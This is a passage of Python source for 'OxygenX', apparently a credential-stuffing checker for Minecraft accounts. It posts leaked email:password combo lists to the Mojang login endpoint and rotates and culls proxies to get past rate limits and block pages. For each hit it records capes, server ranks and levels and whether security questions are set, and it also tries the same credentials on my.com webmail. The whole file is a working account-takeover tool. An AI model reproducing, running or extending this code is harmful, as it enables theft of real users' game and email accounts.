                    veltrank = exe.submit(self.veltpvp, username, line).result()
                    mojang = exe.submit(self.mojang, uuid, line, username).result()
                    optifine = exe.submit(self.optifine, username, line).result()
                    labycape = exe.submit(self.labymod, uuid, line, username).result()
                    skyblock = exe.submit(self.skyblock, uuid).result()
                try:
                    if mojang:
                        data.append('\nMojang Cape: True')
                    if optifine:
                        data.append('\nOptifine Cape: True')
                    if labycape:
                        data.append('\nLabymod Cape: True')
                    if OxygenX.Cape.lb:
                        if uuid in self.lbcape:
                            Counter.liquidbounce += 1
                            self.writing([f'{line} | Username: {username}', 'LiquidBounceCape'])
                            data.append('\nLiquidBounce Cape: True')
                    if dosfa:
                        if mailaccess:
                            data.append('\nMFA: True')
                    if veltrank:
                        if not OxygenX.ranktype:
                            saveranked = False
                        data.append(f'\nVelt Rank: {veltrank}')
                    if hiverank:
                        data.append(f'\nHive Rank: {str(hiverank)}')
                        if not OxygenX.ranktype:
                            saveranked = False
                    if OxygenX.Rank.mineplex or OxygenX.Level.mineplex:
                        if mineplex[0]:
                            data.append(f'\nMineplex Rank: {mineplex[0]}')
                            if not OxygenX.ranktype:
                                saveranked = False
                        if mineplex[1]:
                            data.append(f'\nMineplex Level: {str(mineplex[1])}')
                        if not mineplex[0] and not mineplex[1]:
                            data.append(f'\nNo Mineplex Login: True')
                    if OxygenX.Rank.hypixel or OxygenX.Level.hypixel:
                        # hypixel[2] is the "never logged in" flag.
                        if not hypixel[2]:
                            if str(hypixel[0]) not in ['None', 'False']:
                                if not OxygenX.ranktype:
                                    saveranked = False
                                data.append(f'\nHypixel Rank: {hypixel[0]}')
                            if hypixel[1]:
                                data.append(f'\nHypixel Level: {str(hypixel[1])}')
                            if hypixel[3]:
                                data.append(f'\nHypixel LastLogout Date: {hypixel[3]}')
                            if hypixel[4] != 0:
                                data.append(f'\nHypixel SkyWars Coins: {str(hypixel[4])}')
                            if hypixel[5] != 0:
                                data.append(f'\nHypixel BedWars Level: {str(hypixel[5])}')
                            if hypixel[6] != 0:
                                data.append(f'\nHypixel BedWars Coins: {str(hypixel[6])}')
                            if skyblock:
                                data.append(f'\nHypixel SkyBlock Stats: https://sky.lea.moe/stats/{uuid}')
                        else:
                            data.append(f'\nNo Hypixel Login: True')
                except:
                    if OxygenX.debug:
                        self.prints(f'{red}[Error] {line} \nRank/Cape Check Error: {format_exc(limit=1)}')
                if saveranked and dosfa:
                    if sfa:
                        self.writing([line, 'SFA'])
                    else:
                        self.writing([line, 'NFA'])
                self.writing([''.join(data), 'CaptureData'])
                return
        except:
            if OxygenX.debug:
                self.prints(f'{red}[Error] {line} \nError: {format_exc(limit=1)}')
            self.writing([line, 'Error'])
            Counter.error += 1
            return
    else:
        # No ':' separator at all.
        Counter.checked += 1
        Counter.bad += 1
        self.prints(f'{red}[Badline] {line}')
        self.writing([line, 'Badlines'])
        return
def checkmc(self, user, passw, ):
    """Authenticate `user`/`passw` against the auth endpoint (auth_mc).

    Returns the successful requests Response, or the string
    'Invalid credentials' once all retries are exhausted. Retries
    transparently on rate limits, HTML block pages, and proxy failures.
    """
    payload = ({
        'agent': {
            'name': 'Minecraft',
            'version': 1
        },
        'username': user,
        'password': passw,
        'requestUser': 'true'
    })
    bad = 'Invalid credentials'
    retries = 0
    if not OxygenX.Proxy.proxy:
        # Proxyless mode: throttle between attempts instead of rotating IPs.
        while True:
            if retries != OxygenX.retries:
                try:
                    answer = session.post(url=auth_mc, json=payload, headers=jsonheaders,
                                          timeout=OxygenX.timeout)
                    if bad in answer.text:
                        retries += 1
                        sleep(OxygenX.Proxy.sleep)
                        continue
                    elif 'Client sent too many requests too fast.' in answer.text:
                        # Rate limited: back off without burning a retry.
                        sleep(5)
                        continue
                    else:
                        return answer
                except:
                    if OxygenX.debug:
                        self.prints(f'CheckMC ProxyLess: \n{format_exc(limit=1)}')
                    continue
            else:
                return bad
    else:
        while True:
            if retries != OxygenX.retries:
                proxy_form = {}
                proxy = choice(self.proxylist)
                if proxy.count(':') == 3:
                    # host:port:user:pass -> user:pass@host:port
                    spl = proxy.split(':')
                    proxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
                else:
                    proxy = proxy
                locked = OxygenX.Proxy.lock_proxy
                if proxy in ['', '\n']:
                    # Drop blank entries from the pool and pick again.
                    try:
                        self.proxylist.remove(proxy)
                        continue
                    except:
                        pass
                if locked:
                    # Reserve the proxy for this thread; re-added after use.
                    try:
                        self.proxylist.remove(proxy)
                    except:
                        locked = False
                if OxygenX.Proxy.type in ['https', 'http']:
                    proxy_form = {'http': f"http://{proxy}", 'https': f"https://{proxy}"}
                elif OxygenX.Proxy.type in ['socks4', 'socks5']:
                    line = f"{OxygenX.Proxy.type}://{proxy}"
                    proxy_form = {'http': line, 'https': line}
                try:
                    answer = scraper.post(url=auth_mc, proxies=proxy_form, json=payload, headers=jsonheaders,
                                          timeout=OxygenX.timeout)
                    if locked:
                        self.proxylist.append(proxy)
                    if bad in answer.text:
                        retries += 1
                        continue
                    elif answer.headers.get("Content-Type").__contains__("html"):
                        # HTML response is a proxy/captcha page, not the API;
                        # optionally cull the proxy (bounded by remove_limit).
                        if OxygenX.Proxy.remove_bad_proxy and len(
                                self.proxylist) >= OxygenX.Proxy.proxy_remove_limit:
                            if not locked:
                                try:
                                    self.proxylist.remove(proxy)
                                except:
                                    pass
                        continue
                    else:
                        return answer
                except exceptions.RequestException:
                    if OxygenX.Proxy.remove_bad_proxy and len(self.proxylist) >= OxygenX.Proxy.proxy_remove_limit:
                        if not locked:
                            try:
                                self.proxylist.remove(proxy)
                            except:
                                pass
                    elif locked:
                        self.proxylist.append(proxy)
                except:
                    if locked:
                        self.proxylist.append(proxy)
                    if OxygenX.debug:
                        self.prints(f'CheckMC: \n{format_exc(limit=1)}')
                    continue
            else:
                return bad
def secure_check(self, token):
    """Return True when the account looks SFA, else False.

    Queries sfa_url (presumably the security-challenges endpoint — confirm)
    with the session token; an empty JSON list ('[]') is treated as
    "no security questions".
    """
    headers = {'Pragma': 'no-cache', "Authorization": f"Bearer {token}"}
    try:
        if not OxygenX.Proxy.proxy or not OxygenX.Proxy.sfa_proxy:
            # Direct (proxyless) check.
            try:
                z = session.get(url=sfa_url, headers=headers).text
                if z == '[]':
                    return True
                else:
                    return False
            except:
                if OxygenX.debug:
                    self.prints(f'ErrorSFA ProxyLess: \n{format_exc(limit=1)}')
                return False
        else:
            # Proxied check: rotate random proxies until a definitive answer.
            while True:
                proxy_form = {}
                proxy = choice(self.proxylist)
                if proxy.count(':') == 3:
                    # host:port:user:pass -> user:pass@host:port
                    spl = proxy.split(':')
                    proxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
                else:
                    proxy = proxy
                if proxy in ['', '\n']:
                    try:
                        self.proxylist.remove(proxy)
                        continue
                    except:
                        pass
                if OxygenX.Proxy.type == 'http' or OxygenX.Proxy.type == 'https':
                    proxy_form = {'http': f"http://{proxy}", 'https': f"https://{proxy}"}
                elif OxygenX.Proxy.type == 'socks4' or OxygenX.Proxy.type == 'socks5':
                    line = f"{OxygenX.Proxy.type}://{proxy}"
                    proxy_form = {'http': line, 'https': line}
                try:
                    resp = session.get(url=sfa_url, headers=headers, proxies=proxy_form).text
                    if 'request blocked' in resp.lower():
                        continue
                    elif resp == '[]':
                        return True
                    else:
                        return False
                except exceptions.RequestException:
                    if OxygenX.Proxy.remove_bad_proxy and len(self.proxylist) >= OxygenX.Proxy.proxy_remove_limit:
                        try:
                            self.proxylist.remove(proxy)
                        except:
                            pass
                    continue
    except:
        if OxygenX.debug:
            self.prints(f'Error SFA: \n{format_exc(limit=1)}')
        return False
def checkname(self, username):
    """Return True when the name-lookup API flags `username` as legacy.

    Used in unmigrated mode to pre-filter names worth a login attempt;
    user_url is presumably the Mojang bulk name-lookup endpoint — confirm.
    """
    try:
        if OxygenX.Proxy.proxy:
            while True:
                proxy_form = {}
                proxy = choice(self.proxylist)
                if proxy.count(':') == 3:
                    # host:port:user:pass -> user:pass@host:port
                    spl = proxy.split(':')
                    proxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
                else:
                    proxy = proxy
                if OxygenX.Proxy.type == 'http' or OxygenX.Proxy.type == 'https':
                    proxy_form = {'http': f"http://{proxy}", 'https': f"https://{proxy}"}
                elif OxygenX.Proxy.type == 'socks4' or OxygenX.Proxy.type == 'socks5':
                    line = f"{OxygenX.Proxy.type}://{proxy}"
                    proxy_form = {'http': line, 'https': line}
                try:
                    answer = scraper.post(url=user_url, json=[username], proxies=proxy_form, headers=mailheaders,
                                          timeout=OxygenX.timeout).text
                    if 'The request could not be satisfied' in answer:
                        # CDN block page: pick another proxy.
                        continue
                    elif 'legacy":true' in answer:
                        return True
                    else:
                        return False
                except exceptions.RequestException:
                    if OxygenX.Proxy.remove_bad_proxy and len(self.proxylist) >= OxygenX.Proxy.proxy_remove_limit:
                        try:
                            self.proxylist.remove(proxy)
                        except:
                            pass
                    continue
        else:
            try:
                # Proxyless: pace requests to avoid rate limiting.
                sleep(OxygenX.Proxy.sleep)
                answer = scraper.post(url=user_url, json=[username], headers=mailheaders,
                                      timeout=OxygenX.timeout).text
                if 'legacy":true' in answer:
                    return True
                else:
                    return False
            except:
                if OxygenX.debug:
                    self.prints(f'{red}[Error Check] {format_exc(limit=1)}')
                return False
    except:
        if OxygenX.debug:
            self.prints(f'{red}[Error Check] {format_exc(limit=1)}')
        return False
def title(self):
    """Console-title updater thread: shows live counters until stop_time clears.

    Zero-valued counters are omitted from the title to keep it short.
    """
    while self.stop_time:
        if not self.unmigrated:
            set_title(
                f"OxygenX-{version}"
                f" | Hits: {Counter.hits}"
                f" - Bad: {Counter.bad}"
                f'{"" if Counter.nfa == 0 else f" - NFA: {Counter.nfa}"}'
                f'{"" if Counter.sfa == 0 else f" - SFA: {Counter.sfa}"}'
                f'{"" if Counter.unfa == 0 else f" - Unmigrated: {Counter.unfa}"}'
                f'{"" if Counter.demo == 0 else f" - Demo: {Counter.demo}"}'
                f"{'' if Counter.mfa == 0 else f' - MFA: {Counter.mfa}'}"
                f"{'' if len(Counter.bad_retries) == 0 else f' | Retries: {len(Counter.bad_retries)}'}"
                f"{'' if Counter.error == 0 else f' | Errors: {Counter.error}'}"
                f" | Left: {len(self.accounts) - Counter.checked}/{len(self.accounts)}"
                f'{"" if not OxygenX.Proxy.proxy else f" - Proxies: {len(self.proxylist)}"}'
                f' | CPM: {Counter.cpm}'
                f' | {self.now_time()} Elapsed')
        else:
            set_title(
                f"OxygenX-{version} | "
                f"Hits: {Counter.hits}"
                f" - Bad: {Counter.bad}"
                f'{"" if Counter.legacy_name == 0 else f" - Legacy Lines: {Counter.legacy_name}"}'
                f'{"" if Counter.unfa == 0 else f" - Unmigrated: {Counter.unfa}"}'
                f"{'' if len(Counter.bad_retries) == 0 else f' | Retries: {len(Counter.bad_retries)}'}"
                f"{'' if Counter.error == 0 else f' | Errors: {Counter.error}'}"
                f" | Left: {len(self.accounts) - Counter.checked}/{len(self.accounts)}"
                f'{"" if not OxygenX.Proxy.proxy else f" - Proxies: {len(self.proxylist)}"}'
                f' | CPM: {Counter.cpm}'
                f' | {self.now_time()} Elapsed | Unmigrated Checker')
def prints(self, line):
    """Print a timestamped line, serialized by the global lock.

    try/finally guarantees the lock is released even if print raises
    (e.g. UnicodeEncodeError on exotic usernames) — the original would
    otherwise deadlock every other thread.
    """
    lock.acquire()
    try:
        print(f'{blue}{self.now_time()} {line}')
    finally:
        lock.release()
def writing(self, line):
    """Append line[0] to '<folder>/<line[1]>.txt' under the global lock.

    Uses a context manager so the file handle is always closed, and
    try/finally so the lock is released even when open/write raises
    (the original leaked both on error).
    """
    lock.acquire()
    try:
        with open(f'{self.folder}/{line[1]}.txt', 'a', encoding='u8') as fh:
            fh.write(f'{line[0]}\n')
    finally:
        lock.release()
def optifine(self, user, combo):
    """Check s.optifine.net for an OptiFine cape; record and count hits."""
    has_cape = False
    if OxygenX.Cape.optifine:
        try:
            body = session.get(url=f'http://s.optifine.net/capes/{user}.png').text
            if 'Not found' not in body:
                has_cape = True
                Counter.optifine += 1
                self.writing([f'{combo} | Username: {user}', 'OptifineCape'])
            return has_cape
        except:
            if OxygenX.debug:
                self.prints(f'{red}Error Optifine:\n{format_exc(limit=1)}')
    return has_cape
def mojang(self, uuid, combo, user):
    """Check crafatar for a Mojang cape; record and count when found."""
    has_cape = False
    if OxygenX.Cape.mojang:
        try:
            body = session.get(url=f'https://crafatar.com/capes/{uuid}', headers=mailheaders).text.lower()
            if 'png' in body:
                has_cape = True
                Counter.mojang += 1
                self.writing([f'{combo} | Username: {user}', 'MojangCape'])
            return has_cape
        except:
            if OxygenX.debug:
                self.prints(f'{red}Error MojangCape:\n{format_exc(limit=1)}')
    return has_cape
def labymod(self, uuid, combo, user):
    """Check LabyMod's cape CDN for this uuid; record and count when found."""
    has_cape = False
    if OxygenX.Cape.laby:
        # The CDN expects the dashed UUID form.
        dashed = f'{uuid[:8]}-{uuid[8:12]}-{uuid[12:16]}-{uuid[16:20]}-{uuid[20:]}'
        try:
            body = session.get(url=f'https://capes.labymod.net/capes/{dashed}',
                               headers=mailheaders).text
            if 'Not Found' not in body:
                has_cape = True
                Counter.labymod += 1
                self.writing([f'{combo} | Username: {user}', 'LabymodCape'])
        except:
            if OxygenX.debug:
                self.prints(f'{red}Error Labymod:\n{format_exc(limit=1)}')
    return has_cape
def liquidbounce(self):
    """Fetch the LiquidBounce cape registry text, or False on failure."""
    try:
        if OxygenX.china_network_support:
            # Hard-coded IP plus Host header so the raw.githubusercontent.com
            # DNS block in China is bypassed; TLS verification must be off.
            return session.get(
                url='https://199.232.68.133/CCBlueX/FileCloud/master/LiquidBounce/cape/service.json',
                headers=dict(mailheaders, **{"Host": "raw.githubusercontent.com"}), verify=False).text
        return session.get(
            url='https://raw.githubusercontent.com/CCBlueX/FileCloud/master/LiquidBounce/cape/service.json',
            headers=mailheaders).text
    except:
        if OxygenX.debug:
            self.prints(f'{red}Error LiquidBounce:\n{format_exc(limit=1)}')
        return False
def hivemc(self, uuid, combo):
    """Scrape the HiveMC profile page for a non-default rank.

    Returns the rank string, or False when unranked/disabled/on error.
    """
    rank = False
    if OxygenX.Rank.hivemc:
        try:
            response = session.get(url=f'https://www.hivemc.com/player/{uuid}', headers=mailheaders).text
            match = rankhv.search(response).group(1)
            if match != 'Regular':
                rank = match
        except AttributeError:
            # rankhv.search returned None: no rank element on the page.
            rank = False
        except:
            if OxygenX.debug:
                self.prints(f'{red}Error HiveMC:\n{format_exc(limit=1)}')
        if rank:
            self.writing([f'{combo} | Rank: {str(rank)}', 'HiveRanked'])
            Counter.hivemcrank += 1
    return rank
def mineplex(self, username, combo):
    """Scrape mineplex.com for [rank, level]; entries are False when absent."""
    both = [False, False]
    if OxygenX.Rank.mineplex or OxygenX.Level.mineplex:
        try:
            response = session.get(url=f'https://www.mineplex.com/players/{username}',
                                   headers=mailheaders).text
            if 'That player cannot be found.' in response:
                both[0] = False
                both[1] = False
            else:
                both[0] = str(rankmp.search(response).group(1))
                both[1] = int(levelmp.search(response).group(1))
                if both[0].lower() == '':
                    both[0] = False
        except:
            if OxygenX.debug:
                self.prints(f'{red}Error Mineplex:\n{format_exc(limit=1)}')
        if both[0]:
            Counter.mineplexrank += 1
            self.writing([f'{combo} | Rank: {both[0]}', 'MineplexRanked'])
        # NOTE(review): this guard checks Rank.mineplex but applies the
        # *level* threshold — Level.mineplex looks intended; confirm.
        if both[1] and OxygenX.Rank.mineplex:
            if both[1] >= OxygenX.Level.mineplex_level:
                Counter.mineplexhl += 1
                self.writing([f'{combo} | Level: {str(both[1])}', 'MineplexHighLevel'])
        if not both[0] and not both[1]:
            Counter.nomineplex += 1
            self.writing([combo, 'NoMineplexLogin'])
    return both
def hypixel(self, uuid, combo):
    """Query the Slothpixel API for Hypixel stats.

    Returns a 7-slot list:
    [rank, network level, never-logged-in flag, last-login date,
     SkyWars coins, BedWars level, BedWars coins].
    """
    both = [False, False, False, False, 0, 0, 0]
    if OxygenX.Rank.hypixel or OxygenX.Level.hypixel:
        try:
            answer = session.get(url=f'https://api.slothpixel.me/api/players/{uuid}',
                                 headers=mailheaders).json()
            if 'Failed to get player uuid' not in str(answer):
                rank = str(answer['rank'])
                if '_PLUS' in rank:
                    # e.g. MVP_PLUS -> MVP+
                    rank = rank.replace('_PLUS', '+')
                level = int(answer["level"])
                nolog = str(answer['username'])
                bedwars_level = int(answer['stats']['BedWars']['level'])
                bedwars_coins = int(answer['stats']['BedWars']['coins'])
                skywars_coins = int(answer['stats']['SkyWars']['coins'])
                if nolog == 'None':
                    # No username on record: never logged into Hypixel.
                    both[2] = True
                else:
                    both[0] = str(rank)
                    both[1] = int(round(level))
                    # 'last_login' is epoch milliseconds; keep the date part.
                    # (Callers label this "LastLogout" — confirm which it is.)
                    both[3] = str(datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(
                        milliseconds=int(answer['last_login']))).split(' ')[0]
                    both[4] = skywars_coins
                    both[5] = bedwars_level
                    both[6] = bedwars_coins
            else:
                both[2] = True
        except:
            if OxygenX.debug:
                self.prints(f'{red}Slothpixel API Error: \n{format_exc(limit=1)}')
        if not both[2]:
            if str(both[0]) not in ['None', 'False']:
                Counter.hypixelrank += 1
                self.writing([f'{combo} | Rank: {both[0]}', 'HypixelRanked'])
            if both[1] >= OxygenX.Level.hypixel_level:
                Counter.hypixelhl += 1
                self.writing([f'{combo} | Level: {str(both[1])}', 'HypixelHighLevel'])
        else:
            Counter.nohypixel += 1
            self.writing([combo, 'NoHypixelLogin'])
    return both
def skyblock(self, uuid):
    """Return a sky.lea.moe stats link for the uuid, or False if no profile."""
    link = f'https://sky.lea.moe/stats/{uuid}'
    try:
        page = session.get(url=link).text
        # The landing/search page means no SkyBlock profile exists.
        return False if 'Show SkyBlock stats for' in page else link
    except:
        if OxygenX.debug:
            self.prints(f'{red}Error SkyBlock \n{format_exc(limit=1)}')
        return False
def veltpvp(self, username, combo):
    """Scrape veltpvp.com for a non-default rank; False when none/error."""
    rank = False
    if OxygenX.Rank.veltpvp:
        try:
            link = session.get(url=f'https://www.veltpvp.com/u/{username}', headers=mailheaders).text
            if 'Not Found' not in link:
                rank = veltrankz.search(link).group(1)
                if rank not in ['Default', 'Standard']:
                    rank = rank
                else:
                    rank = False
        except AttributeError:
            # veltrankz.search returned None: no rank element on the page.
            rank = False
        except:
            if OxygenX.debug:
                self.prints(f'{red}Error Veltpvp:\n{format_exc(limit=1)}')
        if rank:
            self.writing([f'{combo} | Rank: {rank}', 'VeltRanked'])
            Counter.veltrank += 1
    return rank
def mailaccess(self, combo):
    """Check whether the combo's credentials also open the my.com mailbox.

    Returns True (and records the hit) when the webmail auth endpoint
    answers exactly 'Ok=1'.
    """
    email, password = combo.split(':', 1)
    mailaccess = False
    if OxygenX.emailaccess:
        try:
            ans = session.get(
                url=f'https://aj-https.my.com/cgi-bin/auth?ajax_call=1&mmp=mail&simple=1&Login={email}&Password={password}',
                headers=mailheaders).text
        except:
            if OxygenX.debug:
                self.prints(f'{red}Error Mail Access: \n{format_exc(limit=1)}')
            # Sentinel so the comparison below fails cleanly.
            ans = 'BAD'
        if ans == 'Ok=1':
            mailaccess = True
            Counter.mfa += 1
            self.writing([combo, 'EmailAccess'])
    return mailaccess
def rproxies(self):
    """Background thread: periodically re-download proxies from the API.

    Replaces self.proxylist wholesale every refresh interval; exits on
    repeated failure or when self.stop_time goes falsy.
    """
    while self.stop_time:
        try:
            sleep(OxygenX.Proxy.API.refresh)
            loader = session.get(OxygenX.Proxy.API.api).text.splitlines()
            if OxygenX.proxy_dup:
                # De-duplicate while dropping blank / malformed entries.
                self.proxylist = list(set([x.strip() for x in loader if ":" in x and x != '']))
            else:
                self.proxylist = [x.strip() for x in loader if ":" in x and x != '']
        except:
            if OxygenX.debug:
                print(f"{red}Error while refreshing proxies: \n{format_exc(limit=1)}\n")
            sleep(60)
            break
def now_time(self):
return strftime("%H:%M:%S", gmtime(time() - self.start_time))
def loadcombo(self):
    """Prompt for a combo file (one entry per line) and fill self.accounts.

    Loops until a non-empty list is loaded; optionally de-duplicates.
    """
    while True:
        try:
            print(f"{cyan}Please Import Your Combo List...")
            sleep(0.3)
            loader = open(fileopenbox(title="Load Combo List", default="*.txt"), 'r', encoding="utf8",
                          errors='ignore').read().split('\n')
            if OxygenX.combo_dup:
                # set() removes duplicates but loses the original order.
                self.accounts = list(set(x.strip() for x in loader if x != ''))
            else:
                self.accounts = [x.strip() for x in loader if x != '']
            if len(self.accounts) == 0:
                print(f'{red}No combo found!, Please make sure file have combos...\n')
                continue
            print(f"{magenta} > Imported {len(self.accounts)} lines")
            break
        except:
            if OxygenX.debug:
                print(f"{red}Error while loading combo: \n{format_exc(limit=1)}\n")
# Load Proxy #
def loadproxy(self):
    """Load proxies from a file or the configured API into self.proxylist.

    No-op when proxy mode is disabled. Starts the rproxies refresher
    thread when loading from an API with a refresh interval >= 30s.
    """
    while True:
        try:
            if OxygenX.Proxy.proxy:
                idk = True   # True -> proxies came from a file, False -> API
                loader = []
                if not OxygenX.Proxy.API.use:
                    print(f"\n{cyan}Please Import Your Proxies List.....")
                    sleep(0.3)
                    loader = open(fileopenbox(title="Load Proxies List", default="*.txt"), 'r', encoding="utf8",
                                  errors='ignore').read().split('\n')
                elif OxygenX.Proxy.API.use:
                    try:
                        idk = False
                        loader = session.get(OxygenX.Proxy.API.api).text.split("\n")
                        if OxygenX.Proxy.API.refresh >= 30:
                            # Spawn the background refresher thread.
                            Thread(target=self.rproxies, daemon=True).start()
                            sleep(2)
                    except:
                        if OxygenX.debug:
                            print(
                                f"{red}Error while loading proxies from api: \n{format_exc(limit=1)}\n")
                        sleep(60)
                        break
                if OxygenX.proxy_dup:
                    self.proxylist = list(set([x.strip() for x in loader if ":" in x and x != '']))
                else:
                    self.proxylist = [x.strip() for x in loader if ":" in x and x != '']
                length_file = len(self.proxylist)
                if length_file == 0:
                    print(f'{red}No proxies found! Please make sure file have proxies...')
                    continue
                elif length_file == 0 and OxygenX.Proxy.API:
                    # NOTE(review): dead branch — the previous `if` already
                    # handled length_file == 0, so this can never run.
                    # Confirm whether the API case was meant to come first.
                    print(f'{red}No proxies found in API, OxygenX will exit in 3 seconds...')
                    sleep(3)
                    exit()
                print(f"{magenta} > Imported {length_file} proxies from {'File' if idk else 'API'}")
                break
            else:
                break
        except:
            if OxygenX.debug:
                print(f"{red}Error while loading proxies: \n{format_exc(limit=1)}\n")
            sleep(60)
            break
def resultfolder(self):
unix = str(strftime('[%d-%m-%Y %H-%M-%S]'))
self.folder = f'results/{unix}'
if not path.exists('results'):
mkdir('results')
if not path.exists(self.folder):
mkdir(self.folder)
def get_announcement(self):
    """Fetch the announcement text from GitHub and store it colorized
    in self.announcement ("Color: <name>" suffix selects the color)."""
    try:
        if OxygenX.china_network_support:
            announcement = session.get(
                'https://199.232.68.133/earthno1/OxygenX4CN/master/announcement',
                headers={"Host": "raw.githubusercontent.com"}, verify=False).text.split("Color: ")
        else:
            announcement = session.get(
                'https://raw.githubusercontent.com/earthno1/OxygenX4CN/master/announcement').text.split("Color: ")
        # dispatch table replaces the original if/elif chain; an unknown
        # tag falls through unchanged, exactly as before
        palette = {
            'red\n': red, 'white\n': white, 'blue\n': blue,
            'green\n': green, 'cyan\n': cyan, 'magenta\n': magenta,
            'yellow\n': yellow,
        }
        tag = announcement[1].lower()
        color = palette.get(tag, tag)
        self.announcement = f"{color}{announcement[0]}"
    except:  # kept bare to preserve the original catch-everything behavior
        if OxygenX.debug:
            print(f"{red}Error while displaying announcement: \n{format_exc(limit=1)}\n")
        return
def start_checker(self):
    """Run the checking thread pool over self.accounts, then print the
    final results banner once every account has been processed."""
    # never spawn more threads than there are accounts
    if OxygenX.threads > len(self.accounts):
        OxygenX.threads = int(len(self.accounts))
    self.get_announcement()
    mainpool = ThreadPool(processes=OxygenX.threads)
    Thread(target=self.title).start()  # background console-title updater
    # feed every account to self.prep; results are tallied in Counter
    mainpool.imap_unordered(func=self.prep, iterable=self.accounts)
    clear()
    print(t)
    print(self.announcement)
    self.start_time = time()
    mainpool.close()
    mainpool.join()  # block until the pool has drained all accounts
    symbo = f'[{Fore.GREEN}>{white}]'
    cyanz = f'[{Fore.CYAN}>{white}]'
    # final summary built from the Counter tallies
    result = f'{white}\n\n[{Fore.YELLOW}>{white}] Results: \n\n' \
             f'[{green}+{white}] Hits: {Counter.hits}\n' \
             f'[{red}-{white}] Bad: {Counter.bad}{white}\n\n' \
             f'[{yellow}>{white}] Demo: {Counter.demo}\n' \
             f'[{green}>{white}] NFA: {Counter.nfa}\n' \
             f'{cyanz} SFA: {Counter.sfa}\n' \
             f'[{blue}>{white}] MFA: {Counter.mfa}\n' \
             f'[{magenta}>{white}] Unmigrated: {Counter.unfa}\n\n' \
             f'{symbo} NoHypixel Login accounts: {Counter.nohypixel}\n' \
             f'{symbo} NoMineplex Login accounts: {Counter.nomineplex}\n' \
             f'{symbo} Mojang capes: {Counter.mojang}\n' \
             f'{symbo} Optifine capes: {Counter.optifine}\n' \
             f'{symbo} Labymod capes: {Counter.labymod}\n' \
             f'{symbo} LiquidBounce capes: {Counter.liquidbounce}\n' \
             f'{symbo} Hypixel Ranked accounts: {Counter.hypixelrank}\n' \
             f'{symbo} Mineplex Ranked accounts: {Counter.mineplexrank}\n' \
             f'{symbo} HiveMC Ranked accounts: {Counter.hivemcrank}\n' \
             f'{symbo} Veltpvp Ranked accounts: {Counter.veltrank}\n' \
             f'{symbo} Hypixel {OxygenX.Level.hypixel_level}+ accounts: {Counter.hypixelhl}\n' \
             f'{symbo} Mineplex {OxygenX.Level.mineplex_level}+ accounts: {Counter.mineplexhl}\n\n' \
             f'{cyanz} Speed: {cyan}{round(Counter.checked / (time() - self.start_time), 2)} accounts/s\n' \
             f'{white}{cyanz} Total time checking: {cyan}{self.now_time()}\n\n' \
             f'[{magenta}x{white}] Finish checking..\n'
    # signals the cpm_counter / title loops to stop
    self.stop_time = False
    print(result)
def cpm_counter(self):
    """Recompute Counter.cpm (checks per minute) from a 3-second sample
    while self.stop_time is truthy."""
    while self.stop_time:
        if Counter.checked < 1:
            continue  # nothing checked yet; keep polling
        snapshot = Counter.checked
        sleep(3)
        Counter.cpm = (Counter.checked - snapshot) * 20
def checkforupdates():
    """Compare the local `version` against the published version.txt and,
    if they differ, show an update notice for five seconds."""
    try:
        if OxygenX.china_network_support:
            gitversion = session.get(
                "https://199.232.68.133/earthno1/OxygenX4CN/master/version.txt",
                headers={"Host": "raw.githubusercontent.com"}, verify=False).text
        else:
            gitversion = session.get(
                "https://raw.githubusercontent.com/earthno1/OxygenX4CN/master/version.txt").text
        # BUG FIX: comparing against f'{version}\n' reported "outdated"
        # whenever the remote file did not end in exactly one "\n"
        # (CRLF endings, or no trailing newline).  Compare stripped values.
        if version != gitversion.strip():
            print(t)
            print(f"{red}Your version is outdated.")
            print(f"Your version: {version}\n")
            print(f'Latest version: {gitversion}Get latest version in the link below')
            print(f"https://github.com/earthno1/OxygenX4CN\nStarting in 5 seconds...{cyan}")
            sleep(5)
            clear()
    except Exception:
        # narrowed from a bare except so SystemExit/KeyboardInterrupt escape
        if OxygenX.debug:
            print(f"{red} Error while checking for updates: \n{format_exc(limit=1)}\n")
class OxygenX:
    """Static configuration, read once from the parsed `settings` mapping.

    NOTE(review): bool(...) of a non-empty *string* is always True
    (e.g. bool("false") is True).  These casts are only correct if the
    settings loader already yields real booleans — confirm upstream.
    """
    china_network_support = bool(settings['OxygenX']['china_network_support'])
    version_check = bool(settings['OxygenX']['check_for_updates'])
    retries = int(settings['OxygenX']['retries'])
    # divided by 1000 — presumably milliseconds -> seconds; confirm at use site
    timeout = int(settings['OxygenX']['timeout']) / 1000
    threads = int(settings['OxygenX']['threads'])
    combo_dup = bool(settings['OxygenX']['combo_duplicates'])     # dedupe combos
    proxy_dup = bool(settings['OxygenX']['proxy_duplicates'])     # dedupe proxies
    emailaccess = bool(settings['OxygenX']['mail_access'])
    ranktype = bool(settings['OxygenX']['save_ranked_type'])
    print_bad = bool(settings['OxygenX']['print_bad'])
    save_bad = bool(settings['OxygenX']['save_bad'])
    debug = bool(settings['OxygenX']['debugging'])

    class Cape:
        # which cape lookups to perform per hit
        lb = bool(settings['OxygenX']['capes']['liquidbounce'])
        optifine = bool(settings['OxygenX']['capes']['optifine'])
        laby = bool(settings['OxygenX']['capes']['labymod'])
        mojang = bool(settings['OxygenX']['capes']['mojang'])

    class Rank:
        # which server-rank lookups to perform per hit
        mineplex = bool(settings['OxygenX']['rank']['mineplex'])
        hypixel = bool(settings['OxygenX']['rank']['hypixel'])
        hivemc = bool(settings['OxygenX']['rank']['hivemc'])
        veltpvp = bool(settings['OxygenX']['rank']['veltpvp'])

    class Level:
        # level checks plus the thresholds used in the results banner
        hypixel = bool(settings['OxygenX']['level']['hypixel'])
        mineplex = bool(settings['OxygenX']['level']['mineplex'])
        hypixel_level = int(settings['OxygenX']['level']['hypixel_level'])
        mineplex_level = int(settings['OxygenX']['level']['mineplex_level'])

    class Proxy:
        proxy = bool(settings['OxygenX']['proxy']['proxy'])
        type = str(settings['OxygenX']['proxy']['proxy_type']).lower()
        lock_proxy = bool(settings['OxygenX']['proxy']['lock_proxy'])
        remove_bad_proxy = bool(settings['OxygenX']['proxy']['remove_bad_proxy'])
        # NOTE(review): +1 presumably makes the configured limit inclusive
        # at its comparison site — confirm where proxy_remove_limit is used
        proxy_remove_limit = int(settings['OxygenX']['proxy']['proxy_remove_limit']) + 1
        sfa_proxy = bool(settings['OxygenX']['proxy']['proxy_for_sfa'])
        sleep = int(settings['OxygenX']['proxy']['sleep_proxyless'])
